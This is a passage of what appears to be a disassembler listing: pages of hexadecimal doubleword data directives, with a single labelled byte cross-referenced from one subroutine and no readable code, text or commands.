		dd 0D058CCF2h, 0C19ED3D7h, 0C2020BA2h, 0C64587AAh, 41D71C8Dh
		dd 2642BA8h, 0CB3B7084h, 3689C56Bh, 5A8DE10Dh, 0CB1490B5h
		dd 0F4ADDE45h, 0CFE05944h, 0F11D5567h, 0B8CAAFF3h, 0BAD0DB04h
		dd 0F26073AAh, 69B757C5h, 0AB48F2F8h, 8CAD0BACh, 0B7FF9BEDh
		dd 6BAC5040h, 2207F7Eh,	196AA74Ch, 183FD242h, 0F2934129h
		dd 80EC0155h, 281AE2EAh, 4029893Bh, 2F96D136h, 10776829h
		dd 78DC4519h, 5A30EB2Ch, 0E1188B22h, 24DA0EF3h,	0CC7DF791h
		dd 27814A0Fh, 0FC925E8Ah, 2CF75EC7h, 9E8D5EBh, 48435D21h
		dd 0AC92611Dh, 0E48A1E3Bh, 0BFF7EE93h, 957560F9h, 0EE9C74E4h
		dd 0F16BC128h, 0F6B2AE9Dh, 9A7D3BB5h, 0BE1B8BEDh, 0EA0BA058h
		dd 883ABA72h, 0E9211199h, 0D332B602h, 0ED565072h, 5774CBB8h
		dd 29E9C5F1h, 0E9F1BACEh, 7101DF76h, 84E05F6Fh,	0C66068F1h
		dd 41995E7Ch, 1E57467Ch
		dd 0CEB239BFh, 1C15213h, 8216D0A3h, 3127304Ch, 0E674E450h
		dd 5D21BFF0h, 8083A02Ah, 0AF652FA7h, 20BF822Fh,	45758834h
		dd 0FE34F290h, 8BF42E92h, 79A58640h, 0E5D2D93Dh, 382D5BD5h
		dd 479C26F3h, 0B7790E9Ch, 0B7B2CA0Ah, 432AACCAh, 77507573h
		dd 0F611029Ch, 9A1CBC91h, 1E7F8A8Eh, 0F5F21387h, 8F55ED40h
		dd 36E59BAAh, 4A6285FBh, 983FF43Ah, 892C1BE8h, 10BECB7Dh
		dd 7D21E69Bh, 0A91C4826h, 7FAACC56h, 0D5092A93h, 0A8BE8D5Ah
		dd 0C5A455ADh, 0E9D88BE4h, 0A413FB55h, 0CFE067DCh, 0D808AF2h
		dd 0C2596754h, 322A850Fh, 4F92556Ch, 0E321D3Ah,	866C5706h
		dd 0F3923745h, 0F5040F8Eh, 0D5011A92h, 8A0685B6h, 0A0FA6373h
		dd 681589D0h, 0C462F74Fh, 816724F6h, 91084BF3h,	0E4B5DC79h
		dd 0A8815F21h, 155A7584h, 0C061BEFEh, 0E2AD4854h, 6C0A56D3h
		dd 7A757320h, 7FD23C26h, 66D8B55Ah, 0EDC907F3h,	0F6C259CBh
		dd 0ED02B90Bh, 537DA2AFh, 6D681FD2h, 57EF1780h,	7455CC7Bh
		dd 8915A5E4h, 2AB6A3ACh, 720C310Dh, 58CF2EBCh, 5D6F5ABDh
		dd 78936A33h, 925F3ABAh, 46278F04h, 0C156014Bh,	7311C0C8h
		dd 35B423h, 0B59BE3DDh,	32BF5D52h, 0BEAB56C7h, 65A25436h
		dd 31862A49h, 567498C6h, 0E1BAA0D2h, 13467D80h,	0B1D452Dh
		dd 202C0C28h, 0F82E44B4h, 6CE6A0E4h, 765A314Bh,	6C316A14h
		dd 957083AFh, 6D4A9494h, 0CEC54h, 0EA047C0Fh, 0C045405Ah
		dd 6A295AEBh, 0CB3DA0DFh, 0EDDAFC6Ch, 0EE66F055h, 0F4822EA9h
		dd 381549FDh, 46495CA1h, 5CE80023h, 884C011Fh, 0D94109E0h
		dd 31BB742Ch, 25D2D994h, 34C19F8Eh, 0DE2031A1h,	1957921Eh
		dd 0BDE2FB07h, 26BCA673h, 3CBA500Ch, 555B8644h,	0C8F6DC94h
		dd 2BF7997h, 52070FF3h,	68574300h, 95EE758Ah, 0E261FCFCh
		dd 1F59180Fh, 0FDEFAC0Dh, 3F5181BCh, 9A35096Eh,	71E06693h
		dd 19FB7ADDh, 2053B840h, 688D4368h, 0D1C6884Bh,	0FE268C4Bh
		dd 5781FFDAh, 940BF209h, 57484747h, 700A7CC2h, 4097B226h
		dd 55A82DFh, 0A9327A18h, 1A6E44ADh, 8F7F0650h, 2DA3C056h
		dd 0D5207DCEh, 1AEDF035h, 0CE5FA08Dh, 0A938F89Eh, 0F9488DBh
		dd 0C6E772CDh, 0EA43705Eh, 86A5AE46h, 623AF1D4h, 0A746D214h
		dd 1E7803CEh, 0C55C55C9h, 0EA47F21Fh, 0B2C0E9A8h, 0DA871475h
		dd 0D10F4254h, 0E5630067h, 9AB6C1BCh, 19D317C8h, 5F463D2Ah
		dd 0A89995A9h, 7E88E91Fh, 0BE820808h, 0D1A1EABh, 54E19EBCh
		dd 0D5439BF0h, 5BFB2026h, 1EC147F1h, 0E6528760h, 0CAAD2E90h
		dd 0E4AD2B9h, 6BC44096h, 44F0A470h, 0E4AABB90h,	8D2A22CEh
		dd 0CBC4A6ACh, 5F8FEF64h, 0E71D100Eh, 3808197h,	75C6437Ch
		dd 1358510Ch, 0A03E2876h, 21F58232h, 39E1BAD3h,	821A2FA4h
		dd 9A581D48h, 49004DCh,	28C64E5Bh, 0A96325B2h, 0DA29D142h
		dd 2092813Ch, 813B104Bh, 827DAD19h, 3A4083E1h, 884CFA33h
		dd 13E03619h, 9454060h,	8FA47C96h, 0FD9D114Eh, 8A70D4CBh
		dd 3E8C4A08h, 12D07D33h, 0ADD08F76h, 2C122609h,	285F40AFh
		dd 371759D3h, 5261309Ch, 4411F048h, 54E1910Dh, 8728168h
		dd 408E3452h, 4199208Ah, 970C480Eh, 65B5D8CCh, 0DD26EE55h
		dd 0A27623E0h, 801DAFF1h, 20099350h, 5194862Eh,	42044B31h
		dd 0D7FC27AEh, 2C42507h, 6E305393h, 0C2F99973h,	11D3CFEh
		dd 8D4677Eh, 0EBE720FEh, 0FE440D18h, 3579F903h,	0C0F30E7Eh
		dd 10F43430h, 0B1A487E4h, 49A22D81h, 8A830BE2h,	67025362h
		dd 0FF6E8266h, 4E65BC1h, 9CDD131h, 39174B92h, 24D8F4A0h
		dd 0CF088E5Dh, 3B243B01h, 0B5621846h, 76014114h, 4BC32010h
		dd 82BD6E2Ch, 3433D983h, 0AA743D7h, 28684890h, 1DD08D94h
		dd 8F043A63h, 50D7BA2Ch, 0EEF0174h, 0A405760Eh,	454D66E9h
		dd 0BCBF5721h, 1A457FC2h, 943CF1B9h, 24DF7D8Bh,	2489E938h
		dd 889E025h, 489FB4Ah, 5641F74Ah, 8B80EFC2h, 195DAFBFh
		dd 0F7596F0h, 89E51BA7h, 4829FFF9h, 0C859D25Fh,	0A3031E00h
		dd 0C23B4BACh, 0D250E6Ah, 0C1A28272h, 6472FFFEh, 10B1AD5h
		dd 4405844h, 4316EE89h,	0FA2FFBAh, 0D8E6104Eh, 0E9150FDFh
		dd 68460422h, 0D60B0E83h, 1F0A8143h, 0A4391069h, 59031AD4h
		dd 0F2880960h, 66830FA7h, 1FF50447h, 0A0385029h, 0FB07C17Bh
		dd 0CF7F50C3h, 54459D5h, 6FB02B2Bh, 2E912543h, 96D2EC29h
		dd 0D5F84C23h, 173E1EBBh, 0C9869564h, 0E516EB7Ah, 80303D40h
		dd 0D44C7665h, 68D8515Ch, 96661A3Fh, 7AD247F3h,	190488BEh
		dd 422C1005h, 1595AD46h, 55135B22h, 91A404CAh, 9F7226E9h
		dd 3B91AC5Dh, 83BBACAAh, 50169EFFh, 431705E4h, 0AE904A1Ch
		dd 429BA67h, 0CF5CC166h, 0CA5E6306h, 0C653C982h, 1B84A3C9h
		dd 5D916842h, 0B2884604h, 6A205C8Ch, 1B46FF23h,	90E14BEDh
		dd 38A35144h, 62FEA533h, 0BAA75881h, 47C46210h,	0F39F0EEh
		dd 0D6F33A89h, 0E5F49206h, 482A0E23h, 0A0E558CAh, 81E03B9Ch
		dd 0B10977E1h, 0F9E79177h, 0BEC30C35h, 0CCF365Eh, 0C4A37BAFh
		dd 562A9F70h, 6C23DCFDh, 0F5D68238h, 0E9AC0448h, 4E95098Bh
		dd 7882473Ah, 110B90FBh, 0A37E539h, 0E0683624h,	0DF55103Fh
		dd 840A4ECEh, 195ECA29h, 0EBD14BA4h, 3874483h, 6069B69Ch
		dd 87007BA4h, 5B8CA647h, 73780787h, 2FE07817h, 16D60B8Bh
		dd 0A90CA402h, 0D1771EB0h, 0D7860AFDh, 3FB8E944h, 8CCDB2FFh
		dd 5116B6D3h, 0DC211437h, 0C9B269CDh, 99F06AD2h, 0BCAA79EFh
		dd 0D01102D2h, 32E96347h, 47008E9Fh, 7F8B13BFh,	196E7207h
		dd 0E96AFB7h, 0A151AFBh, 5B543B8Ah, 8A73B41h, 597B1542h
		dd 408E055h, 0C6637BEh,	303A17AEh, 0A11D0204h, 0A5DDC3E9h
		dd 20080671h, 0CE2F00EDh, 0F93BC310h, 74B2416Fh, 0F23B6C09h
		dd 0F4A5005h, 22E97CF7h, 5007FBC3h, 44EE5E75h, 0BB837A0Ah
		dd 83E0DBE5h, 0DE64AA85h, 0D5428471h, 2C9B7D1h,	0F3E3B4ABh
		dd 0CA1725A1h, 0BCD814BAh, 35D71503h, 0E12A69A4h, 7BD9EBF8h
		dd 930DDBBFh, 0BA185090h, 66D08D67h, 507015E6h,	0B61C4E2Fh
		dd 0AB2F7D79h, 242A067h, 0AFA7D825h, 0BC00401Ah, 1080D5A7h
		dd 5C8A122h, 0A0BAE114h, 1B446382h, 5921F887h, 0D7FC2FB0h
		dd 298C897Fh, 0F5753A1h, 8C561834h, 13C55A17h, 3431A28Dh
		dd 0EDE4F62Dh, 16C00524h, 0B1EB5000h, 48193FF1h, 1D59E058h
		dd 0EE836046h, 4A62E8D2h, 0A07F2CF2h, 0CCEEC924h, 775BAA00h
		dd 235A54Ch, 46190148h,	0BFB2D183h, 5AF7B892h, 208C11C6h
		dd 56E2640Bh, 8A6FAD52h, 58FC0893h, 19507506h, 8AAC691Ah
		dd 0E53D6582h, 6792A599h, 0F4614E19h, 25F10656h, 0C29C0786h
		dd 80EEF5E3h, 3FC13518h, 170A433Bh, 7D0A0928h, 2D3FCEC6h
		dd 184FB0A6h, 0FCB0A1CAh, 0F820C417h, 0C3F80E0h, 10B3981Fh
		dd 0FF30023h, 0A4346A2Bh, 81BE5BE6h, 0F85FCFA5h, 0A7F4C310h
		dd 5C0AEEB0h, 304C350Eh, 415400A6h, 804CFFA6h, 0C7E21095h
		dd 42AB129Dh, 0F85FEAAh, 0AFD433AEh, 0F90D05A7h, 28436B03h
		dd 5C4AD571h, 28460551h, 0FA2E205Ah, 416D89FAh,	242BE79h
		dd 0D20E525Eh, 68C2FB71h, 0D366338Ah, 3836DEF7h, 0D0F405E4h
		dd 155E6C68h, 0B6E94A6Ah, 0A575E574h, 0A2FD49ECh, 9D1B9CD2h
		dd 2921E5A2h, 0FD172C30h, 0D8080AA4h, 0A57D37A1h, 207F201Eh
		dd 870C8412h, 0F3BECC3Eh, 30147BFFh, 80609B8h, 1539326Ch
		dd 0E12B76D5h, 281CDD32h, 6D827129h, 0AAC37601h, 0A682A98Bh
		dd 56C4B83Eh, 0C75A9E26h
		dd 31A254F1h, 0B37D2E8Ah, 921F6D45h, 405D9E4h, 0DBF1BF6Ah
		dd 6A5A8053h, 37D73030h, 0F32A66FBh, 208F5592h,	0B1C3091Bh
		dd 0CA08BF40h, 6BA1F0B7h, 1380A410h, 0D7936D28h, 8D1778BBh
		dd 90BE14A9h, 0C0B2FCC5h, 5C03DCB7h, 9EAA5C2Fh,	9A63CCDBh
		dd 4347205Dh, 5C2904C6h, 48F640D5h, 21A1D0A0h, 9FA273Ch
		dd 49AB2D29h, 0E5E81956h, 6662072h, 0AD1A3BEBh,	0F886E44Bh
		dd 15E50DBBh, 0AB2CE9CCh, 5E95D74h, 0F8101128h,	5F580071h
		dd 9ACC9325h, 39477E6Bh, 85BE3ABCh, 0ED09AC3Bh,	0D08DF5AAh
		dd 3ECADEBDh, 0C114F861h, 0E2AB7E34h, 59C07AE6h, 0FA62165Ch
		dd 4C2533E6h, 1D5DAAB1h, 10575203h, 0F95F47A9h,	4412C93h
		dd 2C3779A2h, 0F2D17F24h, 0F3D8B407h, 0B627F411h, 9504C5D4h
		dd 0F92EF159h, 0EFA5AAA0h, 0ED05A1AAh, 8A80C773h, 8E95FE33h
		dd 58EBD5AEh, 10E5E6E7h, 2245221Bh, 0B1598D08h,	0B7D880BBh
		dd 0EFA66118h, 1D6ED024h, 0E9A383DFh, 8A7E123Bh, 94072D41h
		dd 58EF2A0Fh, 45D97D34h, 0E9C1A663h, 0AE5D538Ah, 419D4862h
		dd 968894B5h, 79FC5E6Ah, 0CC0C2441h, 0F7E18FF0h, 87A0AA2h
		dd 0D5659FF1h, 54FCE158h, 4F21B5Ch, 0F2D18AB8h,	60B668EBh
		dd 2114C5C5h, 463014ECh, 38EEA9B2h, 1DDAFAB7h, 143B39F7h
		dd 2E937E37h, 3A8D4DE6h, 0EEC48003h, 0B4642D2Bh, 7D1D6A6Bh
		dd 1E86EA53h, 0B8EA6FF6h, 0BA573518h, 0C98DE216h, 209495E8h
		dd 0CBACABEBh, 0AB9152F0h, 9B8DAB2h, 0B22F0A96h, 3E62BA26h
		dd 7BB275EEh, 0EC3B47DCh, 6ACDB332h, 0F7BFF946h, 27551A77h
		dd 54D056F0h, 4BD1732Fh, 0D0C29B27h, 0AEFD4E3Dh, 81DA74B6h
		dd 1BA6D03Bh, 6E1AAB0Dh, 2714FF22h, 0D9B7E18Dh,	7478755Ch
		dd 2881D34h, 0B04935F5h, 0AEBF7631h, 0F7C5B542h, 0A01222B1h
		dd 32B66CEBh, 0EBBC627Fh, 4247BFE2h, 3953C750h,	2586469Ah
		dd 0D60708A0h, 0E9913AD3h, 0B138DB02h, 0BC043D75h, 5179EA33h
		dd 9999ABACh, 49E5F330h, 0C22320D7h, 7649597Dh,	5846322Eh
		dd 4B80D749h, 7CEFD418h, 2B5AB8BFh, 10B702FBh, 7AE9FA28h
		dd 0C21967A8h, 0FE7C055Dh, 0A9030164h, 65E0BD6Dh, 0DB65931Bh
		dd 54712AE6h, 9895CE03h, 6169ABE6h, 0C6F9F21Dh,	0AEA003E0h
		dd 0EBD830B2h, 74D196A3h, 6B372CD0h, 54787D8Ah,	0CA7E919Fh
		dd 0E7B5183h, 1FF50A76h, 0FC9D2402h, 1B3FD55Ah,	8359AD08h
		dd 758BF008h, 4E00A1AAh, 92108559h, 50A1FB38h, 0E1A09457h
		dd 235D3B2Ch, 0DCA81E50h, 50EAB55Eh, 20AACB50h,	0EA8FCCF6h
		dd 101A21A2h, 0BED1043Ch, 8BBFC48Ch, 0A68C2C86h, 0BF0AE59Ch
		dd 29AA572Ah, 0B0159540h, 3ACC20E1h, 4FE3BBA6h,	0E674A9A6h
		dd 28A7BD78h, 0D3C61C78h, 0FED62B7Dh, 52C7EFE0h, 0D3B64315h
		dd 0BDEACAD5h, 5757328Ah, 0D15E1BBCh, 0C4738FE7h, 0FDE71623h
		dd 9CEB8982h, 0A56555E5h, 23F93E8Bh, 5F225E2Eh,	5799CDCCh
		dd 2A0B47CAh, 4392D320h, 6FF5ACC4h, 7186BF84h, 0EFA70FC4h
		dd 0F3B106FEh, 9BAA445Fh, 4F3F2AB8h, 0C5F56AA8h, 0D3498CBAh
		dd 7CEF2568h, 5D2ADD20h, 0C5D4859Ch, 0B31942EBh, 0F1BD5DAAh
		dd 84389DDh, 0FC1088EAh, 457130ABh, 5BA8532Eh, 74DE7C3Fh
		dd 0A145FA9Dh, 4DB34EF6h, 7883F09Dh, 379F23F5h,	3D785FD4h
		dd 0EC256BBFh, 0C15FC3Ah, 20D4E112h, 0CEE19DE3h, 0EBB48424h
		dd 69C4B934h, 0B97CFD1Fh, 67FA15D5h, 3D7BAA20h,	0EEFFDB7Dh
		dd 0EEDD9DFh, 537F71BEh, 2BDCCED7h, 8BAB991Ah, 0C0C275A8h
		dd 9DFE09E7h, 2332DA44h, 57AD5FA5h, 67CBF5E0h, 8BFC28BEh
		dd 0A2AFACA5h, 66563A6Eh, 0B853B130h, 0C7D85231h, 5BEC8A09h
		db 3, 0B2h, 0Fh
byte_46554B	db 4Ah			; DATA XREF: sub_455BE2-D6Co
		dd 5E3843D0h, 0C6BCB0F8h, 0AA99A078h, 0F8D5EC83h, 62AA449Ch
		dd 77CD5E20h, 972D0D6h,	0ABBBA4F9h, 6F0ABDC3h, 5114C3D9h
		dd 89A14615h, 1C0BCBB3h, 0A0AA0C75h, 48DAE432h,	7538B34Dh
		dd 4445AA24h, 2AF8EBF9h, 7E2070D8h, 4A1DC7B0h, 2EAC9CE9h
		dd 90637AA3h, 10FDF763h, 8ED4762h, 5AC6B506h, 4920E045h
		dd 7EF8628Eh, 74FA5C08h, 0F0A7A55Dh, 607FA747h,	4334ECA8h
		dd 5D3D6DD7h, 8A02021h,	911C5498h, 0DC054847h, 31703A13h
		dd 3223246Dh, 1435EC6Dh, 94E524C5h, 67DE2C0h, 0B394071h
		dd 5EB7276h, 0E0798242h, 786BF45Fh, 0C484DC61h,	3E4506B0h
		dd 61A49BAAh, 80495F3Bh, 8059A16Dh, 0AB5A2912h,	0CA6203E3h
		dd 86E8115Dh, 0EE51F98Bh, 0B552F6Ah, 0EF2B314Fh, 7D069F12h
		dd 481ADE03h, 7D706993h, 0B311EA59h, 0B2DFCA33h, 0F5E09FD9h
		dd 4FE2160Eh, 193F0F20h, 84E2FC73h, 0CAE2E282h,	62C5A0C4h
		dd 270421D4h, 4E4D0B01h, 38A69A18h, 0CEC8D7E7h,	2C71FF2Bh
		dd 444CB539h, 0FCE546Ah, 0CB092A14h, 144EB014h,	0D4A3C4Bh
		dd 5D7E75CAh, 5DA30031h, 7898AFBAh, 95B9F366h, 51580FCDh
		dd 0FC5F800Ah, 809C349Eh, 9FA34291h, 40654C2Eh,	189D38E6h
		dd 77584F15h, 0CC2A466Bh, 8450D20h, 7D9E8142h, 80D1D22Ch
		dd 349E07CCh, 1EF45B96h, 57EAEE46h, 2C5125E9h, 0BA11062Ah
		dd 1976ABA8h, 2A459AE9h, 48F51531h, 0AC6171E2h,	827AECC4h
		dd 27E08B1Fh, 0C09EE22Bh, 322B65A4h, 0DA68C8B0h, 0B9A203D1h
		dd 0D5B1A93Dh, 0A3EE614Ch, 0A0667F0Bh, 5F432972h, 0EC2507F7h
		dd 0FD3CD63Bh, 6B981F34h, 0D7E1B63Dh, 2B451CDDh, 8D606A8Bh
		dd 2A667CF0h, 5F74BB0Dh, 0E9A1EE45h, 0CFE01DB2h, 441E1BBEh
		dd 0B3A16D17h, 75287F08h, 0D6BA631Ch, 0B74004FEh, 97E86B0Bh
		dd 0A5210521h, 9C262B2Bh, 12EEB60Ch, 848B72CCh,	0D885988h
		dd 0E3B5D7BAh, 0E9D9C211h, 0FCF958A2h, 9C1CA190h, 0FB41733Ch
		dd 0F96EA5Ah, 3293AFC4h, 0FB1454BBh, 0E5A59462h, 5837C1CFh
		dd 631BFE77h, 0BAB71A06h, 460D7380h, 36145CBFh,	8B5D518Dh
		dd 0FF286F69h, 0C8BF0953h, 3020146Fh, 639090B2h, 0D53B85E0h
		dd 77F053E0h, 95F7FF75h, 0D3D6DB16h, 0E31CA075h, 0E7478B82h
		dd 0B75CA9BEh, 0F980A67Dh, 0E5E66BFCh, 835131B4h, 750F19C6h
		dd 0D25C7174h, 4A458377h, 0F7EC0490h, 0B68CE60Bh, 0B25F0284h
		dd 9B51A1D8h, 0DFFE2159h, 8BE16AFFh, 0F442460Dh, 592C0209h
		dd 0BA4589C4h, 86BB7DA0h, 0CCC21BE1h, 5F0F9809h, 0EBBAEB0Fh
		dd 7D3E8504h, 0B67D8CA9h, 0A3BB3349h, 45CD7B90h, 4C7D7D5h
		dd 92A27CBEh, 42AF1907h, 60D0021Dh, 2065929Ah, 79F1FA97h
		dd 15EDA8CAh, 0B7AF3846h, 0BDB942CFh, 6F0A4B7Bh, 0DA84B877h
		dd 1B18CB20h, 7DEAE1EAh, 25646ABDh, 0C1A13561h,	515EC0B1h
		dd 12B9F02h, 0A706761h,	60DC5077h, 3E33B18h, 3E120035h
		dd 50D193E4h, 9748D527h, 3FEB4C25h, 0CF5D2622h,	0AE9E8CAEh
		dd 0F156D4A9h, 89428CEh, 0FF8B7F0Ch, 889AFA06h,	9E7D5FCEh
		dd 7F70115Dh, 0D69282B6h, 0DDCE7444h, 0EAAD34B1h, 356E3D14h
		dd 28133893h, 0C4E5CE98h, 9AC7B34Ch, 7A8E9EF0h,	37ADA859h
		dd 6951BEEDh, 300B5E56h, 1B698E97h, 534732C4h, 0A69BAC5Ch
		dd 243A5E92h, 378BEA1Fh, 4CC4220Dh, 8CD73FC3h, 69712D03h
		dd 483A045Ah, 4B94F17Eh, 5E9FFC9Bh, 0A230F8E9h,	7CA5EFD2h
		dd 2B0F54E4h, 704E65D8h, 0EBCC2ADh, 5520FC81h, 4854BD4h
		dd 0C0578AEBh, 6A45BB92h, 0E812FCC6h, 0A94031B5h, 0CE2AEE01h
		dd 80999F3Fh, 0F2C84658h, 2CAEF020h, 91597E13h,	1F2101F7h
		dd 920805CAh, 847714h, 0A878D152h, 2B2BC0ABh, 912496ABh
		dd 2F1857FBh, 1949F041h, 4BD58835h, 3B293AA4h, 53328008h
		dd 93808904h, 0A18F7FBh, 211CF0F8h, 0C88B862h, 64AE6A04h
		dd 3244936Eh, 74133EB3h, 76302F91h, 534CFC5Dh, 2E9E294Ch
		dd 0F7ED2766h, 113C5E8Dh, 0F85C6DAh, 672A7E0Ch,	0CB74CB0Eh
		dd 0D8E0E1C9h, 0FAC7A16Bh, 8E4C16A0h, 1360A00Ch, 67AED518h
		dd 0A5FEAB0Bh, 0AACC1ACBh, 527348D0h, 0C608502Ch, 66225574h
		dd 87BB6316h, 28A521EBh, 4421E4DCh, 0C4D3F13Ch,	7843840Eh
		dd 61B67F17h, 5557E0F4h, 1F87AA4Fh, 0DFB2E823h,	4DC50FD1h
		dd 923AAAFDh, 2B21D5E0h, 82C3AFE0h, 8FA8FBF6h, 1C3B4CB1h
		dd 3ECD4607h, 3891EA66h, 13D90598h, 0B40A9C03h,	7116C91Bh
		dd 0C82207C3h, 9F48ADBFh, 9069AC02h, 9BFE7EB3h,	8A599882h
		dd 0A8543D74h, 7C359DE3h, 7BE5B0E0h, 47E9AD03h,	4D264585h
		dd 31CCEC20h, 7E438DAh,	687519Ch, 8233F2BCh, 0AFDC1406h
		dd 0C4500A47h, 3758FE2Ah, 1CEB17A7h, 0F5C2396Eh, 16321118h
		dd 2F47FDCh, 156C0672h,	0A5AA0FFBh, 1DDBB5Bh, 0D96260ABh
		dd 0C38C0376h, 0C0CF809h, 19A358A8h, 5C12C55Bh,	0A8A32BCAh
		dd 44C45DCFh, 0D2910E9Bh, 6C9F95CCh, 0CC6FF4E5h, 862C153Ah
		dd 3B90A378h, 95D1939Ch, 0A667EE13h, 0D889BD70h, 0F6A7D3EFh
		dd 7FE6F4CAh, 0E4936571h, 0BF335E6Bh, 424373E8h, 8CD48653h
		dd 251B8372h, 0AF3FEA35h, 29D2A97h, 3E3E3068h, 93EFDD9h
		dd 178518BEh, 23D79DD6h, 8289E95Fh, 0BA0EF82Ah,	9B8728Bh
		dd 0C124A176h, 13512368h, 55CAD800h, 7456F448h,	0D93091h
		dd 2455A46h, 65B89C92h,	9F67B144h, 1CAE6C51h, 63C52145h
		dd 23F28A2Bh, 539BCD9Dh, 0D604A3A2h, 0F1676A45h, 0C51DC769h
		dd 0C951EA77h, 54550DB8h, 807337AAh, 13BBDB9Bh,	0A44D03A3h
		dd 0CA81AB46h, 0E313A708h, 714CD03h, 4045E3B3h,	0D9917C15h
		dd 31B7C5FDh, 0E870A0E6h, 0C273E6h, 0F0D747CAh,	851CF02Fh
		dd 3BD75CEFh, 9994C1ACh, 23020251h, 1785710Ah, 46B9B28Eh
		dd 9BEEEB70h, 9E48CBECh, 32F8546Ah, 59D0AECh, 60C4B9FBh
		dd 88F26B34h, 0AE56ABB3h, 1748A96h, 9CE691C5h, 978428A2h
		dd 5EC42D71h, 0A294D0C1h, 39D50F9Ch, 22AFE1EEh,	0DD47141Fh
		dd 20BEB8D4h, 0D0F9195Ah, 5513C030h, 2E49CD07h,	710AD566h
		dd 15683EAh, 0A08ACA6Eh, 6CD72E73h, 0C9C2DF37h,	95118B9h
		dd 8E052CA7h, 2C73AC8Bh, 43BFCBBBh, 14371D4Ah, 0C13C43C3h
		dd 260C4111h, 9663C6CFh, 21CE67DCh, 0CA2AC95Fh,	2D769518h
		dd 0EB013576h, 421F8F7Ah, 0B1FABD39h, 92D59CE0h, 25137F2Fh
		dd 0D215FAA0h, 0D1F0AE5Dh, 0AFE78A83h, 0FF299C0Bh, 41CA115Fh
		dd 8E720C27h, 31B40E1Ch, 0E30390BBh, 669CDEB8h,	65248A4h
		dd 51B86521h, 5BA335D6h, 1A2DBF16h, 4B33F0C4h, 3ACC5A01h
		dd 22ADE23Eh, 3F831329h, 161B44E1h, 5289C0Fh, 2BE3A478h
		dd 4D925A3h, 0FAE6E2B3h, 0AB5045BDh, 0B8BA0C0Ch, 4EAD2B9Eh
		dd 0BF143B29h, 0B466A22h, 1C42AA81h, 5AEDB9A1h,	0AC05AD68h
		dd 14720880h, 0B9555359h, 0C77CAA66h, 0BB0538C5h, 378A89B3h
		dd 6AF0C02Ch, 8EE79704h, 52EB04FEh, 4D009D97h, 0DECFF02Fh
		dd 482DCB69h, 4A62DF4Bh, 8EACDF01h, 0A38A7ACh, 4F72A720h
		dd 0EB19CB9Ah, 3DC9EB69h, 36B0B462h, 0DA9DC571h, 0CC764082h
		dd 1CD43759h, 20E2A1F3h, 24651682h, 492A1874h, 2A70F17Ch
		dd 1473A16Eh, 0CA1565CAh, 82498359h, 0D7D62389h, 3EBF3872h
		dd 94222A22h, 81964D40h, 43E7236Ah, 0D80D00CBh,	2D1B3716h
		dd 0C3733DB1h, 9C899715h, 8B5D45E6h, 0D9DDABF2h, 0ADA117BFh
		dd 323000B3h, 0B8309030h, 0BC34258Eh, 7FFF6CA6h, 0E0CB572h
		dd 0D92D2644h, 8AA207EFh
		dd 0A073EF2Dh, 3883C33Fh, 0C502C735h, 67C8BBD3h, 2508C59Ch
		dd 3A556B87h, 0EBEAE2F8h, 0DC4676C4h, 3350DC89h, 0DACD68D4h
		dd 0F8FB99F6h, 38CBAAEFh, 38174BC6h, 315D5C77h,	9B189EC0h
		dd 0F6040DBAh, 0D6564251h, 5119081Dh, 61ECEDF6h, 5CA1C32Bh
		dd 9E315542h, 0BB7EF28Ah, 8162EB97h, 4F5D471h, 94C78899h
		dd 0BEA09E80h, 0E7274EEh, 44AFDD07h, 5E626581h,	2A551B87h
		dd 0EA239957h, 1EC7A474h, 6A8CB7A9h, 8122DE53h,	36CC1935h
		dd 0C5E628BEh, 3CBEAF04h, 0CD19186Eh, 28A33AFh,	0EEAFD4ABh
		dd 888F5976h, 86B88CE5h, 95025FA0h, 59774B72h, 7B4E72CDh
		dd 28D47F49h, 45FA2040h, 87B78B6Ch, 2DBE358Ah, 0FD70DE1Dh
		dd 0C2B3E4D1h, 50293B54h, 7FF48884h, 0E5F640E9h, 18BE9589h
		dd 13F96221h, 6BBE44B0h, 0C1C4A968h, 0DD3E2084h, 26272C9Ch
		dd 0AC17FFE2h, 6328D31Bh, 6FCEFF41h, 0E0F68AE3h, 1E5493DCh
		dd 67D865Ch, 0B4325F25h, 0A1419FB8h, 79151FB7h,	7D3AA66h
		dd 0DBD56ABFh, 7EA67FFFh, 0F97835E3h, 2848D08Bh, 7657D426h
		dd 0A4AA9040h, 17B6F962h, 51377FF6h, 10ADADDBh,	0C58C2E62h
		dd 17815393h, 48E95250h, 5893A262h, 55C74757h, 3F831321h
		dd 0D439EEB3h, 4E478AFh, 54B1EBA6h, 0E7170527h,	85F0DBFh
		dd 0D09FCA19h, 3545809Fh, 0E233209Dh, 3AA6663Fh, 17B485E7h
		dd 62A0D444h, 981FA18Fh, 0EB3B371Dh, 98E44B83h,	0EAC30BE9h
		dd 0EB62E078h, 9112A585h, 14584161h, 8B72E9E1h,	7AB5F3Dh
		dd 0ABD1CC17h, 83156A34h, 0A0BF45F2h, 0D05F06E3h, 0AEE09424h
		dd 0E2952ACh, 10C08E75h, 0BAFCDB11h, 0CD2968E0h, 306D317Fh
		dd 0E3D2B31h, 372EAF58h, 31903C94h, 8EA928Ah, 1154354Dh
		dd 30E101A4h, 455C4BDAh, 9AA73BD2h, 38651B95h, 0DA0B137h
		dd 8CAD78CFh, 0E7096739h, 0E2D99553h, 5A3DFB55h, 70BE2FB1h
		dd 7DAC15F0h, 0FEEEFD82h, 0A8841957h, 0A9DA115Dh, 0C6118E03h
		dd 51853838h, 6322C8E2h, 1D7D78EBh, 0A3090CAFh,	0BB011045h
		dd 576BC651h, 109F5754h, 0A89FE101h, 0DBBA649Fh, 8266217h
		dd 0F1D7FD03h, 68A2638Ah, 32304611h, 195E7441h,	6DE69471h
		dd 1DDF3D6Ah, 0AC0A0EAFh, 0BD5F53EEh, 0CE662576h, 40B95EEEh
		dd 524003F3h, 0FD6C540h, 7EAE5A0Dh, 84C5F43Ah, 0F0C71E2Fh
		dd 0C6F3180h, 0D576CDFAh, 4D20CC5Bh, 477DDB91h,	0F9058634h
		dd 0FE7C9C8h, 5AE9783Eh, 954FC09Dh, 0FC6E3150h,	3512B4EFh
		dd 7F0D16A3h, 0F5F1B416h, 0F5C741CAh, 8895E5F0h, 0E9095DD1h
		dd 0F685ACCAh, 678A0C35h, 0EE6C860Eh, 5FD4B2BAh, 3E4778FCh
		dd 0CCC08853h, 90C4656Dh, 83003FCEh, 8100148h, 0C0F8C781h
		dd 8BFA3211h, 0D5A7DA92h, 6BF7CBCFh, 280B1A20h,	0E47B01E0h
		dd 732B00F9h, 0CBA0E33Bh, 7C17A749h, 0E096AE61h, 9F47586Ah
